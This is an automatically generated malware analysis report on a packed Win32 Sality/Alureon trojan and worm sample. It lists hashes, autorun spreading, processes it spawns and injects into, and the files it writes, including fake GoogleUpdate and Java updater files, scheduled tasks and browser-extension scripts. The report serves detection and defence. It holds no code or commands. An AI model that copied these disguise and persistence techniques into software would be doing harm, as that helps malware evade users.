Win32.Sality.3 (B) (Emsisoft), Win32.Sality.3 (AdAware), Trojan.Win32.Alureon.FD, Virus.Win32.Sality.FD, Virus.Win32.Sality.2.FD, VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan, Worm, Virus, WormAutorun
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 4349e06c6d8b7677af3099bc0ee5d727
SHA1: 15b8ebdfa17bcc42081ae6dacc15669d27dd0388
SHA256: e385622cb5ed5e8cae557e320849d0595c325db264c713fc5eafa70aaac1eb6c
SSDeep: 196608:foymYvquDTSnlxpf8FBXFf5ihM36YfYbYDGgbTfoe2:fo5YvtSnlXf8FZ4YDVbTq
Size: 8041352 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-12-04 15:55:02
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Trojan creates the following process(es):
GoogleUpdate.exe:2460
GoogleUpdate.exe:756
GoogleUpdate.exe:2652
GoogleUpdate.exe:2296
GoogleUpdate.exe:1288
GoogleUpdate.exe:2364
GoogleUpdate.exe:2356
772406a5-70fe-462f-841c-e18bdccbdc78-3.exe:1540
Iufkopcpdfjpcg.exe:424
MPlayerplus_01-bg.exe:2776
772406a5-70fe-462f-841c-e18bdccbdc78-4.exe:2112
%original file name%.exe:688
regsvr32.exe:2736
dwwin.exe:3088
MPlayerplus_01-codedownloader.exe:2344
MPlayerplus_01-codedownloader.exe:2224
772406a5-70fe-462f-841c-e18bdccbdc78-2.exe:2848
The Trojan injects its code into the following process(es):
3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe:852
Explorer.EXE:1684
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process GoogleUpdate.exe:2460 makes changes in the file system.
The Trojan deletes the following file(s):
%Program Files%\globalUpdate\Update\Install (0 bytes)
The process GoogleUpdate.exe:756 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Cab9.tmp (54 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C3E814D1CB223AFCD58214D14C3B7EAB (220 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (2712 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineUA.job (898 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll (1281 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8BD11C4A2318EC8E5A82462092971DEA (477 bytes)
%WinDir%\Tasks\globalUpdateUpdateTaskMachineCore.job (894 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabB.tmp (56 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (54 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe (46 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psuser.dll (673 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C3E814D1CB223AFCD58214D14C3B7EAB (341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarC.tmp (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar8.tmp (2712 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateHelper.msi (32 bytes)
%Program Files%\globalUpdate\Update\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (56 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8BD11C4A2318EC8E5A82462092971DEA (208 bytes)
%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll (673 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CabB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar8.tmp (0 bytes)
The process Iufkopcpdfjpcg.exe:424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr5.tmp (352077 bytes)
%Program Files%\MPlayerplus_01\MPlayerplus_01-bg.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsisos.dll (5 bytes)
%Program Files%\MPlayerplus_01\MPlayerplus_01-bho.dll (3361 bytes)
%Program Files%\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-4.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\1.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\userCode\extension.js (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\102.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\253.js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\7.js (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\39.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\4.js (3312 bytes)
%Program Files%\MPlayerplus_01\MPlayerplus_01-codedownloader.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\252c_appcompat.txt (4124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\247798 (258822 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\191.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\goopdate.dll (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\13.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\94.js (1 bytes)
%WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-4.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\211.js (797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\64.js (2 bytes)
%Program Files%\MPlayerplus_01\1293297481.mxaddon (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\91.js (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\207.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\InstallerUtils.dll (25824 bytes)
%Program Files%\MPlayerplus_01\MPlayerplus_01.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\46.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleUpdateOnDemand.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\14.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleUpdate.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\155.js (449 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\72.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\244.js (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\42.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\246.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (11 bytes)
%Program Files%\MPlayerplus_01\utils.exe (66998 bytes)
%Program Files%\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-2.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\md5dll.dll (6 bytes)
%Program Files%\MPlayerplus_01\360-54246.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\update[1].json (39 bytes)
%Program Files%\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-5.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleUpdateBroker.exe (46 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\psuser.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\190.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\103.js (2 bytes)
%Program Files%\MPlayerplus_01\54246.xpi (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\221.js (383 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\93.js (793 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\psmachine.dll (673 bytes)
%WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-2.job (70 bytes)
%Program Files%\MPlayerplus_01\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ExecDos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe (3312 bytes)
%WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-5.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\104.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\220.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\233.js (797 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\37.js (2 bytes)
%Program Files%\MPlayerplus_01\Uninstall.exe (601 bytes)
%WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-3.job (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\goopdateres_en.dll (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\17.js (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-1.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\9.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\update.json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\InstallerUtils2.dll (3312 bytes)
%WinDir%\Tasks\temp_772406a5-70fe-462f-841c-e18bdccbdc78-2.job (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\195.js (378 bytes)
%Program Files%\MPlayerplus_01\54246.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\npGoogleUpdate4.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleCrashHandler.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleUpdateHelper.msi (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins.json (15 bytes)
%Program Files%\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-3.exe (13122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\226.js (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\260954 (973591 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\38.js (2 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\211.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\190.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\28.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\17.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\45.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\41.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\manifest.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\103.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\91.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\21.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\64.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\update.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\221.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\userCode\background.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\1.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\207.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\35.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\182.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\246.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\94.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\93.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\102.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\253.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\7.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\userCode (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\44.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\46.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\39.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\183.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\14.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\36.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\155.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\40.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\InstallerUtils2.dll (0 bytes)
%WinDir%\Tasks\temp_772406a5-70fe-462f-841c-e18bdccbdc78-2.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\22.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\72.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\195.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\244.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\47.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\2.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\4.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\242.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\104.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\220.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\37.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\184.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\233.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\191.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\78.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\9.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\43.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\3.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\userCode\extension.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\226.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\13.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\260954 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\42.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\177.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\247798 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\38.js (0 bytes)
The process %original file name%.exe:688 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\system.ini (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00157D19_Rar\%original file name%.exe (61184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (265148 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Zvbbyym.tmp (248938 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Iufkopcpdfjpcg.exe (983586 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\WrapperUtils.dll (2392 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Zvbbyym.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Iufkopcpdfjpcg.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\WrapperUtils.dll (0 bytes)
The process MPlayerplus_01-codedownloader.exe:2344 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\263[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\223[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\286[1].js (975 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\93[1].js (951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\281[1].js (483 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\184[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\plugins[1].json (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\246[1].js (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\233[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\244[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\260[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\192[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\bg_code[1].js (432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\104[1].js (919 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\195[1].js (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\289[1].js (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\273[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\180[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\262[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\42[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\jquery-1_7_1_min[1].js (44457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\242[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\102[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\91[1].js (86201 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\211[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\221[1].js (413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\269[1].js (491 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\220[1].js (13921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\275[1].js (823 bytes)
